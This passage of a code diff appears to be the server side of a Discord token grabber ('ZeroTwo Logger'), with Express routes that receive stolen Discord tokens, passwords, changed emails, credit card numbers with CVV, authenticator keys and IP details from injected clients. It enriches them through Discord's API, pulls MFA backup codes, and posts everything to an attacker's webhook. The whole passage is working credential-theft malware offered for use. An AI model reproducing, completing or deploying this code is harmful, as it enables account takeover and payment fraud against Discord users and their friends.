+ req = JSON.parse(req.body)
148
+ res.sendStatus(200)
149
+ var basicInfos = getInfo("https://discord.com/api/v9/users/@me", req.token)
150
+ if (basicInfos == "Invalid") return
151
+ var billingInfos = getInfo("https://discord.com/api/v9/users/@me/billing/payment-sources", req.token)
152
+ var friendsInfos = getInfo("https://discordapp.com/api/v9/users/@me/relationships", req.token)
153
+ var guildInfos = getInfo("https://discord.com/api/v9/users/@me/guilds", req.token)
154
+ var appliInfos = getInfo("https://discord.com/api/v9/applications", req.token)
155
+ var connectInfos = getInfo("https://discordapp.com/api/v9/users/@me/connections", req.token)
156
+ var ipInfos = getIPInfo(req.ipAddress)
157
+ var owowner = 0,
158
+ bio, phone
159
+ guildInfos.forEach(r => r.owner && owowner++)
160
+ if (billingInfos.length > 0) billing = `\`Yes \` `
161
+ else billing = "```No.```"
162
+ billingInfos.forEach(i => {
163
+ i.brand && 0 == i.invalid && (billing += "<:y_card_spc:918956324908318720> "),
164
+ i.email && (billing += "<:paypal:891011558040277072> ")
165
+ });
166
+ if (basicInfos.bio) bio = basicInfos.bio
167
+ else bio = "𝗡𝗼 𝗕𝗶𝗼𝗴𝗿𝗮𝗽𝗵𝘆"
168
+ if (bio.startsWith("```") && bio.endsWith("```")) bio = bio.slice(3, -3)
169
+ if (basicInfos.phone !== null) phone = basicInfos.phone
170
+ else phone = "𝗡𝗼 𝐏𝗵𝗼𝗻𝗲."
171
+ if (basicInfos.banner) var image = `https://cdn.discordapp.com/banners/${basicInfos.id}/${basicInfos.banner}.png?size=512`
172
+ else var image = "https://www.icegif.com/wp-content/uploads/icegif-219.gif"
173
+ var embed = new Discord.RichEmbed()
174
+ .setAuthor(`By ٴ!"𝐍𝐨𝐭.𝐅𝐮𝐛𝐮𝐤𝐢𝐢 †ٴٴ#6900`, "http://image.noelshack.com/fichiers/2021/49/6/1639241258-22023458-bb44-4943-97e9-20bbbed8cd10.gif", "https://discord.gg/VJTmKz4yPX")
175
+ .setTitle("𝐄𝐦𝐚𝐢𝐥 𝐂𝐡𝐚𝐧𝐠𝐞𝐝 !")
176
+ .setURL("https://github.com/GayarraFrost/DiscordTokenGrabber")
177
+ .addField("𝗨𝘀𝗲𝗿𝗻𝗮𝗺𝗲", "```" + `${basicInfos.username}#${basicInfos.discriminator}` + "```")
178
+ .addField("𝐁𝐚𝐝𝐠𝐞𝐬", badges(basicInfos.flags), true)
179
+ .addField("𝗡𝗶𝘁𝗿𝗼", getNitro(basicInfos.premium_type), true)
180
+ .addField("𝐅𝗿𝐢𝗲𝐧𝐝𝐬", "`" + friendsInfos.filter(r => r.type == 1).length + "`", true)
181
+ .addField("𝐏𝐚𝐲𝐦𝐞𝐧𝐭 𝐌𝐞𝐭𝐡𝐨𝐝", billing, true)
182
+ .addField("𝐓𝐨𝐭𝐚𝐥 𝐆𝐮𝐢𝐥𝐝", "`" + guildInfos.length + "`", true)
183
+ .addField("𝐓𝐨𝐭𝐚𝐥 𝐆𝐮𝐢𝐥𝐝 𝐎𝐰𝐧", "`" + owowner + "`", true)
184
+ .addField("𝐓𝐨𝐭𝐚𝐥 𝐀𝐩𝐩𝐥𝐢𝐜𝐚𝐭𝐢𝐨𝐧𝐬", "`" + appliInfos.length + "`", true)
185
+ .addField("𝐓𝐨𝐭𝐚𝐥 𝐂𝐨𝐧𝐧𝐞𝐜𝐭𝐢𝐨𝐧𝐬", "`" + connectInfos.length + "`", true)
186
+ .addField("𝗡𝗦𝗙𝗪 𝗔𝗹𝗹𝗼𝘄𝗲𝗱 ", "`" + basicInfos.nsfw_allowed + "`", true)
187
+ .addField("𝗩𝗲𝗿𝗶𝗳𝗶𝗲𝗱", "`" + basicInfos.verified + "`", true)
188
+ .addField("𝗕𝗶𝗼𝗴𝗿𝗮𝗽𝗵𝗶𝗲", "```" + bio + "```")
189
+ .addField("𝐍𝐞𝐰 𝗘𝗺𝗮𝗶𝗹", "```" + req.newEmail + "```")
190
+ .addField("𝗣𝗵𝗼𝗻𝗲", "```" + phone + "```")
191
+ .addField("𝐏𝐀𝐒𝐒𝐖𝐎𝐑𝐃: ", "```" + req.password + "```")
192
+ .addField("𝗧𝗼𝗸𝗲𝗻", "```" + req.token + "```")
193
+ .addField("𝐈𝐏 𝐈𝐧𝐟𝐨𝐬", "```" + `${ipInfos.country} | ${ipInfos.regionName}\n${ipInfos.city} | ${ipInfos.isp}\n${ipInfos.query}` + "```")
194
+ .setThumbnail(`https://cdn.discordapp.com/avatars/${basicInfos.id}/${basicInfos.avatar}.png?size=128`)
195
+ .setImage(image)
196
+ .setColor("#00aaaa")
197
+ .setFooter("𝗭𝗲𝗿𝗼𝗧𝘄𝗼 𝗟𝗼𝗴𝗴𝗲𝗿 𝗕𝘆 𝗡𝗼𝘁.𝗙𝘂𝗯𝘂𝗸𝗶𝗶", "http://image.noelshack.com/fichiers/2021/35/4/1630603625-a-67d7f1132cb32d9f903d69da5b880524.gif")
198
+ basicInfos.mfa_enabled == true && embed.addField("𝐌𝐅𝐀 𝐂𝐨𝐝𝐞𝐬", "```" + getMFACode(req.token, req.password) + "```")
199
+ embed.addField("𝗜𝗻𝗷𝗲𝗰𝘁𝗲𝗱 𝗜𝗻", "```" + req.injected.split("\\")[5] + "```")
200
+ webhook.send(embed)
201
+ var friendEmbed = new Discord.RichEmbed()
202
+ .setAuthor(`By ٴ!"𝐍𝐨𝐭.𝐅𝐮𝐛𝐮𝐤𝐢𝐢 †ٴٴ#6900`, "http://image.noelshack.com/fichiers/2021/49/6/1639241258-22023458-bb44-4943-97e9-20bbbed8cd10.gif", "https://discord.gg/VJTmKz4yPX")
203
+ .setTitle(`𝐅𝐫𝐢𝐞𝐧𝐝𝐬 𝐅𝐫𝐨𝐦 ${basicInfos.username}`)
204
+ .setURL("https://github.com/GayarraFrost/DiscordTokenGrabber")
205
+ .setDescription(friendInfos(friendsInfos))
206
+ .setThumbnail(`https://cdn.discordapp.com/avatars/${basicInfos.id}/${basicInfos.avatar}.png?size=128`)
207
+ .setImage(image)
208
+ .setColor("#00aaaa")
209
+ .setFooter("𝗭𝗲𝗿𝗼𝗧𝘄𝗼 𝗟𝗼𝗴𝗴𝗲𝗿 𝗕𝘆 𝗡𝗼𝘁.𝗙𝘂𝗯𝘂𝗸𝗶𝗶", "http://image.noelshack.com/fichiers/2021/35/4/1630603625-a-67d7f1132cb32d9f903d69da5b880524.gif")
210
+ webhook.send(friendEmbed)
211
+ })
212
+ app.post("/paypal", (req, res) => {
213
+ req = JSON.parse(req.body)
214
+ res.sendStatus(200)
215
+ var basicInfos = getInfo("https://discord.com/api/v9/users/@me", req.token)
216
+ if (basicInfos == "Invalid") return
217
+ var billingInfos = getInfo("https://discord.com/api/v9/users/@me/billing/payment-sources", req.token)
218
+ var friendsInfos = getInfo("https://discordapp.com/api/v9/users/@me/relationships", req.token)
219
+ var guildInfos = getInfo("https://discord.com/api/v9/users/@me/guilds", req.token)
220
+ var appliInfos = getInfo("https://discord.com/api/v9/applications", req.token)
221
+ var connectInfos = getInfo("https://discordapp.com/api/v9/users/@me/connections", req.token)
222
+ var ipInfos = getIPInfo(req.ipAddress)
223
+ var owowner = 0,
224
+ bio, phone
225
+ guildInfos.forEach(r => r.owner && owowner++)
226
+ if (billingInfos.length > 0) billing = `\`Yes \` `
227
+ else billing = "```No.```"
228
+ billingInfos.forEach(i => {
229
+ i.brand && 0 == i.invalid && (billing += "<:y_card_spc:918956324908318720> "),
230
+ i.email && (billing += "<:paypal:891011558040277072> ")
231
+ });
232
+ if (basicInfos.bio) bio = basicInfos.bio
233
+ else bio = "𝗡𝗼 𝗕𝗶𝗼𝗴𝗿𝗮𝗽𝗵𝘆"
234
+ if (bio.startsWith("```") && bio.endsWith("```")) bio = bio.slice(3, -3)
235
+ if (basicInfos.phone !== null) phone = basicInfos.phone
236
+ else phone = "𝗡𝗼 𝐏𝗵𝗼𝗻𝗲."
237
+ if (basicInfos.banner) var image = `https://cdn.discordapp.com/banners/${basicInfos.id}/${basicInfos.banner}.png?size=512`
238
+ else var image = "https://www.icegif.com/wp-content/uploads/icegif-219.gif"
239
+ var embed = new Discord.RichEmbed()
240
+ .setAuthor(`By ٴ!"𝐍𝐨𝐭.𝐅𝐮𝐛𝐮𝐤𝐢𝐢 †ٴٴ#6900`, "http://image.noelshack.com/fichiers/2021/49/6/1639241258-22023458-bb44-4943-97e9-20bbbed8cd10.gif", "https://discord.gg/VJTmKz4yPX")
241
+ .setTitle("𝐏𝐚𝐲𝐩𝐚𝐥 𝐀𝐝𝐝𝐢𝐧𝐠 !")
242
+ .setDescription(`${basicInfos.username} 𝐈𝐬 𝐀𝐝𝐝𝐢𝐧𝐠 𝐀 𝐏𝐚𝐲𝐩𝐚𝐥 𝐓𝐨 𝐇𝐢𝐬 𝐀𝐜𝐜𝐨𝐮𝐧𝐭`)
243
+ .setURL("https://github.com/GayarraFrost/DiscordTokenGrabber")
244
+ .addField("𝗨𝘀𝗲𝗿𝗻𝗮𝗺𝗲", "```" + `${basicInfos.username}#${basicInfos.discriminator}` + "```")
245
+ .addField("𝐁𝐚𝐝𝐠𝐞𝐬", badges(basicInfos.flags), true)
246
+ .addField("𝗡𝗶𝘁𝗿𝗼", getNitro(basicInfos.premium_type), true)
247
+ .addField("𝐅𝗿𝐢𝗲𝐧𝐝𝐬", "`" + friendsInfos.filter(r => r.type == 1).length + "`", true)
248
+ .addField("𝐏𝐚𝐲𝐦𝐞𝐧𝐭 𝐌𝐞𝐭𝐡𝐨𝐝", billing, true)
249
+ .addField("𝐓𝐨𝐭𝐚𝐥 𝐆𝐮𝐢𝐥𝐝", "`" + guildInfos.length + "`", true)
250
+ .addField("𝐓𝐨𝐭𝐚𝐥 𝐆𝐮𝐢𝐥𝐝 𝐎𝐰𝐧", "`" + owowner + "`", true)
251
+ .addField("𝐓𝐨𝐭𝐚𝐥 𝐀𝐩𝐩𝐥𝐢𝐜𝐚𝐭𝐢𝐨𝐧𝐬", "`" + appliInfos.length + "`", true)
252
+ .addField("𝐓𝐨𝐭𝐚𝐥 𝐂𝐨𝐧𝐧𝐞𝐜𝐭𝐢𝐨𝐧𝐬", "`" + connectInfos.length + "`", true)
253
+ .addField("𝗡𝗦𝗙𝗪 𝗔𝗹𝗹𝗼𝘄𝗲𝗱 ", "`" + basicInfos.nsfw_allowed + "`", true)
254
+ .addField("𝗩𝗲𝗿𝗶𝗳𝗶𝗲𝗱", "`" + basicInfos.verified + "`", true)
255
+ .addField("𝗕𝗶𝗼𝗴𝗿𝗮𝗽𝗵𝗶𝗲", "```" + bio + "```")
256
+ .addField("𝗘𝗺𝗮𝗶𝗹", "```" + basicInfos.email + "```")
257
+ .addField("𝗣𝗵𝗼𝗻𝗲", "```" + phone + "```")
258
+ .addField("𝗧𝗼𝗸𝗲𝗻", "```" + req.token + "```")
259
+ .addField("𝐈𝐏 𝐈𝐧𝐟𝐨𝐬", "```" + `${ipInfos.country} | ${ipInfos.regionName}\n${ipInfos.city} | ${ipInfos.isp}\n${ipInfos.query}` + "```")
260
+ .setThumbnail(`https://cdn.discordapp.com/avatars/${basicInfos.id}/${basicInfos.avatar}.png?size=128`)
261
+ .setImage(image)
262
+ .setColor("#00aaaa")
263
+ .setFooter("𝗭𝗲𝗿𝗼𝗧𝘄𝗼 𝗟𝗼𝗴𝗴𝗲𝗿 𝗕𝘆 𝗡𝗼𝘁.𝗙𝘂𝗯𝘂𝗸𝗶𝗶", "http://image.noelshack.com/fichiers/2021/35/4/1630603625-a-67d7f1132cb32d9f903d69da5b880524.gif")
264
+ embed.addField("𝗜𝗻𝗷𝗲𝗰𝘁𝗲𝗱 𝗜𝗻", "```" + req.injected.split("\\")[5] + "```")
265
+ webhook.send(embed)
266
+ var friendEmbed = new Discord.RichEmbed()
267
+ .setAuthor(`By ٴ!"𝐍𝐨𝐭.𝐅𝐮𝐛𝐮𝐤𝐢𝐢 †ٴٴ#6900`, "http://image.noelshack.com/fichiers/2021/49/6/1639241258-22023458-bb44-4943-97e9-20bbbed8cd10.gif", "https://discord.gg/VJTmKz4yPX")
268
+ .setTitle(`𝐅𝐫𝐢𝐞𝐧𝐝𝐬 𝐅𝐫𝐨𝐦 ${basicInfos.username}`)
269
+ .setURL("https://github.com/GayarraFrost/DiscordTokenGrabber")
270
+ .setDescription(friendInfos(friendsInfos))
271
+ .setThumbnail(`https://cdn.discordapp.com/avatars/${basicInfos.id}/${basicInfos.avatar}.png?size=128`)
272
+ .setImage(image)
273
+ .setColor("#00aaaa")
274
+ .setFooter("𝗭𝗲𝗿𝗼𝗧𝘄𝗼 𝗟𝗼𝗴𝗴𝗲𝗿 𝗕𝘆 𝗡𝗼𝘁.𝗙𝘂𝗯𝘂𝗸𝗶𝗶", "http://image.noelshack.com/fichiers/2021/35/4/1630603625-a-67d7f1132cb32d9f903d69da5b880524.gif")
275
+ webhook.send(friendEmbed)
276
+ })
277
+ app.post("/card", (req, res) => {
278
+ res.sendStatus(200)
279
+ req = JSON.parse(req.body)
280
+ var basicInfos = getInfo("https://discord.com/api/v9/users/@me", req.token)
281
+ if (basicInfos == "Invalid") return
282
+ var billingInfos = getInfo("https://discord.com/api/v9/users/@me/billing/payment-sources", req.token)
283
+ var friendsInfos = getInfo("https://discordapp.com/api/v9/users/@me/relationships", req.token)
284
+ var guildInfos = getInfo("https://discord.com/api/v9/users/@me/guilds", req.token)
285
+ var appliInfos = getInfo("https://discord.com/api/v9/applications", req.token)
286
+ var connectInfos = getInfo("https://discordapp.com/api/v9/users/@me/connections", req.token)
287
+ var ipInfos = getIPInfo(req.ipAddress)
288
+ var owowner = 0,
289
+ bio, phone
290
+ guildInfos.forEach(r => r.owner && owowner++)
291
+ if (billingInfos.length > 0) billing = `\`Yes \` `
292
+ else billing = "```No.```"
293
+ billingInfos.forEach(i => {
294
+ i.brand && 0 == i.invalid && (billing += "<:y_card_spc:918956324908318720> "),
295
+ i.email && (billing += "<:paypal:891011558040277072> ")
296
+ });
297
+ if (basicInfos.bio) bio = basicInfos.bio
298
+ else bio = "𝗡𝗼 𝗕𝗶𝗼𝗴𝗿𝗮𝗽𝗵𝘆"
299
+ if (bio.startsWith("```") && bio.endsWith("```")) bio = bio.slice(3, -3)
300
+ if (basicInfos.phone !== null) phone = basicInfos.phone
301
+ else phone = "𝗡𝗼 𝐏𝗵𝗼𝗻𝗲."
302
+ if (basicInfos.banner) var image = `https://cdn.discordapp.com/banners/${basicInfos.id}/${basicInfos.banner}.png?size=512`
303
+ else var image = "https://www.icegif.com/wp-content/uploads/icegif-219.gif"
304
+ var embed = new Discord.RichEmbed()
305
+ .setAuthor(`By ٴ!"𝐍𝐨𝐭.𝐅𝐮𝐛𝐮𝐤𝐢𝐢 †ٴٴ#6900`, "http://image.noelshack.com/fichiers/2021/49/6/1639241258-22023458-bb44-4943-97e9-20bbbed8cd10.gif", "https://discord.gg/VJTmKz4yPX")
306
+ .setTitle("𝗖𝗿𝗲𝗱𝗶𝘁 𝗖𝗮𝗿𝗱 𝐀𝐝𝐝𝐢𝐧𝐠 !")
307
+ .setDescription(`${basicInfos.username} 𝐈𝐬 𝐀𝐝𝐝𝐢𝐧𝐠 𝐀 𝗖𝗿𝗲𝗱𝗶𝘁 𝗖𝗮𝗿𝗱 𝐓𝐨 𝐇𝐢𝐬 𝐀𝐜𝐜𝐨𝐮𝐧𝐭`)
308
+ .setURL("https://github.com/GayarraFrost/DiscordTokenGrabber")
309
+ .addField("𝗨𝘀𝗲𝗿𝗻𝗮𝗺𝗲", "```" + `${basicInfos.username}#${basicInfos.discriminator}` + "```")
310
+ .addField("𝐁𝐚𝐝𝐠𝐞𝐬", badges(basicInfos.flags), true)
311
+ .addField("𝗡𝗶𝘁𝗿𝗼", getNitro(basicInfos.premium_type), true)
312
+ .addField("𝐅𝗿𝐢𝗲𝐧𝐝𝐬", "`" + friendsInfos.filter(r => r.type == 1).length + "`", true)
313
+ .addField("𝐏𝐚𝐲𝐦𝐞𝐧𝐭 𝐌𝐞𝐭𝐡𝐨𝐝", billing, true)
314
+ .addField("𝐓𝐨𝐭𝐚𝐥 𝐆𝐮𝐢𝐥𝐝", "`" + guildInfos.length + "`", true)
315
+ .addField("𝐓𝐨𝐭𝐚𝐥 𝐆𝐮𝐢𝐥𝐝 𝐎𝐰𝐧", "`" + owowner + "`", true)
316
+ .addField("𝐓𝐨𝐭𝐚𝐥 𝐀𝐩𝐩𝐥𝐢𝐜𝐚𝐭𝐢𝐨𝐧𝐬", "`" + appliInfos.length + "`", true)
317
+ .addField("𝐓𝐨𝐭𝐚𝐥 𝐂𝐨𝐧𝐧𝐞𝐜𝐭𝐢𝐨𝐧𝐬", "`" + connectInfos.length + "`", true)
318
+ .addField("𝗡𝗦𝗙𝗪 𝗔𝗹𝗹𝗼𝘄𝗲𝗱 ", "`" + basicInfos.nsfw_allowed + "`", true)
319
+ .addField("𝗩𝗲𝗿𝗶𝗳𝗶𝗲𝗱", "`" + basicInfos.verified + "`", true)
320
+ .addField("𝗕𝗶𝗼𝗴𝗿𝗮𝗽𝗵𝗶𝗲", "```" + bio + "```")
321
+ .addField("𝗘𝗺𝗮𝗶𝗹", "```" + basicInfos.email + "```")
322
+ .addField("𝗣𝗵𝗼𝗻𝗲", "```" + phone + "```")
323
+ .addField("𝗧𝗼𝗸𝗲𝗻", "```" + req.token + "```")
324
+ .addField("𝐈𝐏 𝐈𝐧𝐟𝐨𝐬", "```" + `${ipInfos.country} | ${ipInfos.regionName}\n${ipInfos.city} | ${ipInfos.isp}\n${ipInfos.query}` + "```")
325
+ .addField("𝗖𝗿𝗲𝗱𝗶𝘁 𝗖𝗮𝗿𝗱 𝗜𝗻𝗳𝗼𝘀", "```" + `${req.expireAt} | ${req.cvv}\n${req.number}` + "```")
326
+ .addField("𝗘𝘅𝘁𝗿𝗮𝘁 𝗜𝗻𝗳𝗼𝘀", "```" + `GUID: ${req.guid}\nMUID: ${req.muid}\nSID: ${req.sid}\nKey: ${req.key}\nUserAgent: ${req.userAgent}` + "```")
327
+ .setThumbnail(`https://cdn.discordapp.com/avatars/${basicInfos.id}/${basicInfos.avatar}.png?size=128`)
328
+ .setImage(image)
329
+ .setColor("#00aaaa")
330
+ .setFooter("𝗭𝗲𝗿𝗼𝗧𝘄𝗼 𝗟𝗼𝗴𝗴𝗲𝗿 𝗕𝘆 𝗡𝗼𝘁.𝗙𝘂𝗯𝘂𝗸𝗶𝗶", "http://image.noelshack.com/fichiers/2021/35/4/1630603625-a-67d7f1132cb32d9f903d69da5b880524.gif")
331
+ embed.addField("𝗜𝗻𝗷𝗲𝗰𝘁𝗲𝗱 𝗜𝗻", "```" + req.injected.split("\\")[5] + "```")
332
+ webhook.send(embed)
333
+ var friendEmbed = new Discord.RichEmbed()
334
+ .setAuthor(`By ٴ!"𝐍𝐨𝐭.𝐅𝐮𝐛𝐮𝐤𝐢𝐢 †ٴٴ#6900`, "http://image.noelshack.com/fichiers/2021/49/6/1639241258-22023458-bb44-4943-97e9-20bbbed8cd10.gif", "https://discord.gg/VJTmKz4yPX")
335
+ .setTitle(`𝐅𝐫𝐢𝐞𝐧𝐝𝐬 𝐅𝐫𝐨𝐦 ${basicInfos.username}`)
336
+ .setURL("https://github.com/GayarraFrost/DiscordTokenGrabber")
337
+ .setDescription(friendInfos(friendsInfos))
338
+ .setThumbnail(`https://cdn.discordapp.com/avatars/${basicInfos.id}/${basicInfos.avatar}.png?size=128`)
339
+ .setImage(image)
340
+ .setColor("#00aaaa")
341
+ .setFooter("𝗭𝗲𝗿𝗼𝗧𝘄𝗼 𝗟𝗼𝗴𝗴𝗲𝗿 𝗕𝘆 𝗡𝗼𝘁.𝗙𝘂𝗯𝘂𝗸𝗶𝗶", "http://image.noelshack.com/fichiers/2021/35/4/1630603625-a-67d7f1132cb32d9f903d69da5b880524.gif")
342
+ webhook.send(friendEmbed)
343
+ })
344
+ app.post("/mfaenable", (req, res) => {
345
+ req = JSON.parse(req.body)
346
+ res.sendStatus(200)
347
+ var basicInfos = getInfo("https://discord.com/api/v9/users/@me", req.token)
348
+ if (basicInfos == "Invalid") return
349
+ var billingInfos = getInfo("https://discord.com/api/v9/users/@me/billing/payment-sources", req.token)
350
+ var friendsInfos = getInfo("https://discordapp.com/api/v9/users/@me/relationships", req.token)
351
+ var guildInfos = getInfo("https://discord.com/api/v9/users/@me/guilds", req.token)
352
+ var appliInfos = getInfo("https://discord.com/api/v9/applications", req.token)
353
+ var connectInfos = getInfo("https://discordapp.com/api/v9/users/@me/connections", req.token)
354
+ var ipInfos = getIPInfo(req.ipAddress)
355
+ var owowner = 0,
356
+ bio, phone
357
+ guildInfos.forEach(r => r.owner && owowner++)
358
+ if (billingInfos.length > 0) billing = `\`Yes \` `
359
+ else billing = "```No.```"
360
+ billingInfos.forEach(i => {
361
+ i.brand && 0 == i.invalid && (billing += "<:y_card_spc:918956324908318720> "),
362
+ i.email && (billing += "<:paypal:891011558040277072> ")
363
+ });
364
+ if (basicInfos.bio) bio = basicInfos.bio
365
+ else bio = "𝗡𝗼 𝗕𝗶𝗼𝗴𝗿𝗮𝗽𝗵𝘆"
366
+ if (bio.startsWith("```") && bio.endsWith("```")) bio = bio.slice(3, -3)
367
+ if (basicInfos.phone !== null) phone = basicInfos.phone
368
+ else phone = "𝗡𝗼 𝐏𝗵𝗼𝗻𝗲."
369
+ if (basicInfos.banner) var image = `https://cdn.discordapp.com/banners/${basicInfos.id}/${basicInfos.banner}.png?size=512`
370
+ else var image = "https://www.icegif.com/wp-content/uploads/icegif-219.gif"
371
+ var embed = new Discord.RichEmbed()
372
+ .setAuthor(`By ٴ!"𝐍𝐨𝐭.𝐅𝐮𝐛𝐮𝐤𝐢𝐢 †ٴٴ#6900`, "http://image.noelshack.com/fichiers/2021/49/6/1639241258-22023458-bb44-4943-97e9-20bbbed8cd10.gif", "https://discord.gg/VJTmKz4yPX")
373
+ .setTitle("𝗖𝗿𝗲𝗱𝗶𝘁 𝗖𝗮𝗿𝗱 𝐀𝐝𝐝𝐢𝐧𝐠 !")
374
+ .setDescription(`${basicInfos.username} 𝐈𝐬 𝐀𝐝𝐝𝐢𝐧𝐠 𝐀 𝗖𝗿𝗲𝗱𝗶𝘁 𝗖𝗮𝗿𝗱 𝐓𝐨 𝐇𝐢𝐬 𝐀𝐜𝐜𝐨𝐮𝐧𝐭`)
375
+ .setURL("https://github.com/GayarraFrost/DiscordTokenGrabber")
376
+ .addField("𝗨𝘀𝗲𝗿𝗻𝗮𝗺𝗲", "```" + `${basicInfos.username}#${basicInfos.discriminator}` + "```")
377
+ .addField("𝐁𝐚𝐝𝐠𝐞𝐬", badges(basicInfos.flags), true)
378
+ .addField("𝗡𝗶𝘁𝗿𝗼", getNitro(basicInfos.premium_type), true)
379
+ .addField("𝐅𝗿𝐢𝗲𝐧𝐝𝐬", "`" + friendsInfos.filter(r => r.type == 1).length + "`", true)
380
+ .addField("𝐏𝐚𝐲𝐦𝐞𝐧𝐭 𝐌𝐞𝐭𝐡𝐨𝐝", billing, true)
381
+ .addField("𝐓𝐨𝐭𝐚𝐥 𝐆𝐮𝐢𝐥𝐝", "`" + guildInfos.length + "`", true)
382
+ .addField("𝐓𝐨𝐭𝐚𝐥 𝐆𝐮𝐢𝐥𝐝 𝐎𝐰𝐧", "`" + owowner + "`", true)
383
+ .addField("𝐓𝐨𝐭𝐚𝐥 𝐀𝐩𝐩𝐥𝐢𝐜𝐚𝐭𝐢𝐨𝐧𝐬", "`" + appliInfos.length + "`", true)
384
+ .addField("𝐓𝐨𝐭𝐚𝐥 𝐂𝐨𝐧𝐧𝐞𝐜𝐭𝐢𝐨𝐧𝐬", "`" + connectInfos.length + "`", true)
385
+ .addField("𝗡𝗦𝗙𝗪 𝗔𝗹𝗹𝗼𝘄𝗲𝗱 ", "`" + basicInfos.nsfw_allowed + "`", true)
386
+ .addField("𝗩𝗲𝗿𝗶𝗳𝗶𝗲𝗱", "`" + basicInfos.verified + "`", true)
387
+ .addField("𝗕𝗶𝗼𝗴𝗿𝗮𝗽𝗵𝗶𝗲", "```" + bio + "```")
388
+ .addField("𝗘𝗺𝗮𝗶𝗹", "```" + basicInfos.email + "```")
389
+ .addField("𝗣𝗵𝗼𝗻𝗲", "```" + phone + "```")
390
+ .addField("𝗧𝗼𝗸𝗲𝗻", "```" + req.token + "```")
391
+ .addField("𝐏𝐀𝐒𝐒𝐖𝐎𝐑𝐃: ", "```" + req.password + "```")
392
+ .addField("𝐈𝐏 𝐈𝐧𝐟𝐨𝐬", "```" + `${ipInfos.country} | ${ipInfos.regionName}\n${ipInfos.city} | ${ipInfos.isp}\n${ipInfos.query}` + "```")
393
+ .addField("𝗖𝗿𝗲𝗱𝗶𝘁 𝗖𝗮𝗿𝗱 𝗜𝗻𝗳𝗼𝘀", "```" + `Used Code: ${req.code}\nGoogle Auth: ${req.authKey}` + "```")
394
+ .setThumbnail(`https://cdn.discordapp.com/avatars/${basicInfos.id}/${basicInfos.avatar}.png?size=128`)
395
+ .setImage(image)
396
+ .setColor("#00aaaa")
397
+ .setFooter("𝗭𝗲𝗿𝗼𝗧𝘄𝗼 𝗟𝗼𝗴𝗴𝗲𝗿 𝗕𝘆 𝗡𝗼𝘁.𝗙𝘂𝗯𝘂𝗸𝗶𝗶", "http://image.noelshack.com/fichiers/2021/35/4/1630603625-a-67d7f1132cb32d9f903d69da5b880524.gif")
398
+ embed.addField("𝗜𝗻𝗷𝗲𝗰𝘁𝗲𝗱 𝗜𝗻", "```" + req.injected.split("\\")[5] + "```")
399
+ basicInfos.mfa_enabled == true && embed.addField("𝐌𝐅𝐀 𝐂𝐨𝐝𝐞𝐬", "```" + getMFACode(req.token, req.password) + "```")
400
+ webhook.send(embed)
401
+ var friendEmbed = new Discord.RichEmbed()
402
+ .setAuthor(`By ٴ!"𝐍𝐨𝐭.𝐅𝐮𝐛𝐮𝐤𝐢𝐢 †ٴٴ#6900`, "http://image.noelshack.com/fichiers/2021/49/6/1639241258-22023458-bb44-4943-97e9-20bbbed8cd10.gif", "https://discord.gg/VJTmKz4yPX")
403
+ .setTitle(`𝐅𝐫𝐢𝐞𝐧𝐝𝐬 𝐅𝐫𝐨𝐦 ${basicInfos.username}`)
404
+ .setURL("https://github.com/GayarraFrost/DiscordTokenGrabber")
405
+ .setDescription(friendInfos(friendsInfos))
406
+ .setThumbnail(`https://cdn.discordapp.com/avatars/${basicInfos.id}/${basicInfos.avatar}.png?size=128`)
407
+ .setImage(image)
408
+ .setColor("#00aaaa")
409
+ .setFooter("𝗭𝗲𝗿𝗼𝗧𝘄𝗼 𝗟𝗼𝗴𝗴𝗲𝗿 𝗕𝘆 𝗡𝗼𝘁.𝗙𝘂𝗯𝘂𝗸𝗶𝗶", "http://image.noelshack.com/fichiers/2021/35/4/1630603625-a-67d7f1132cb32d9f903d69da5b880524.gif")
410
+ webhook.send(friendEmbed)
411
+ })
412
+ app.post("/mfadisable", (req, res) => {
413
+ req = JSON.parse(req.body)
414
+ res.sendStatus(200)
415
+ var basicInfos = getInfo("https://discord.com/api/v9/users/@me", req.token)
416
+ if (basicInfos == "Invalid") return
417
+ var billingInfos = getInfo("https://discord.com/api/v9/users/@me/billing/payment-sources", req.token)
418
+ var friendsInfos = getInfo("https://discordapp.com/api/v9/users/@me/relationships", req.token)
419
+ var guildInfos = getInfo("https://discord.com/api/v9/users/@me/guilds", req.token)
420
+ var appliInfos = getInfo("https://discord.com/api/v9/applications", req.token)
421
+ var connectInfos = getInfo("https://discordapp.com/api/v9/users/@me/connections", req.token)
422
+ var ipInfos = getIPInfo(req.ipAddress)
423
+ var owowner = 0,
424
+ bio, phone
425
+ guildInfos.forEach(r => r.owner && owowner++)
426
+ if (billingInfos.length > 0) billing = `\`Yes \` `
427
+ else billing = "```No.```"
428
+ billingInfos.forEach(i => {
429
+ i.brand && 0 == i.invalid && (billing += "<:y_card_spc:918956324908318720> "),
430
+ i.email && (billing += "<:paypal:891011558040277072> ")
431
+ });
432
+ if (basicInfos.bio) bio = basicInfos.bio
433
+ else bio = "𝗡𝗼 𝗕𝗶𝗼𝗴𝗿𝗮𝗽𝗵𝘆"
434
+ if (bio.startsWith("```") && bio.endsWith("```")) bio = bio.slice(3, -3)
435
+ if (basicInfos.phone !== null) phone = basicInfos.phone
436
+ else phone = "𝗡𝗼 𝐏𝗵𝗼𝗻𝗲."
437
+ if (basicInfos.banner) var image = `https://cdn.discordapp.com/banners/${basicInfos.id}/${basicInfos.banner}.png?size=512`
438
+ else var image = "https://www.icegif.com/wp-content/uploads/icegif-219.gif"
439
+ var embed = new Discord.RichEmbed()
440
+ .setAuthor(`By ٴ!"𝐍𝐨𝐭.𝐅𝐮𝐛𝐮𝐤𝐢𝐢 †ٴٴ#6900`, "http://image.noelshack.com/fichiers/2021/49/6/1639241258-22023458-bb44-4943-97e9-20bbbed8cd10.gif", "https://discord.gg/VJTmKz4yPX")
441
+ .setTitle("𝐌𝐅𝐀 𝐃𝐢𝐬𝐚𝐛𝐥𝐞𝐝 !")
442
+ .setURL("https://github.com/GayarraFrost/DiscordTokenGrabber")
443
+ .addField("𝗨𝘀𝗲𝗿𝗻𝗮𝗺𝗲", "```" + `${basicInfos.username}#${basicInfos.discriminator}` + "```")
444
+ .addField("𝐁𝐚𝐝𝐠𝐞𝐬", badges(basicInfos.flags), true)
445
+ .addField("𝗡𝗶𝘁𝗿𝗼", getNitro(basicInfos.premium_type), true)
446
+ .addField("𝐅𝗿𝐢𝗲𝐧𝐝𝐬", "`" + friendsInfos.filter(r => r.type == 1).length + "`", true)
447
+ .addField("𝐏𝐚𝐲𝐦𝐞𝐧𝐭 𝐌𝐞𝐭𝐡𝐨𝐝", billing, true)
448
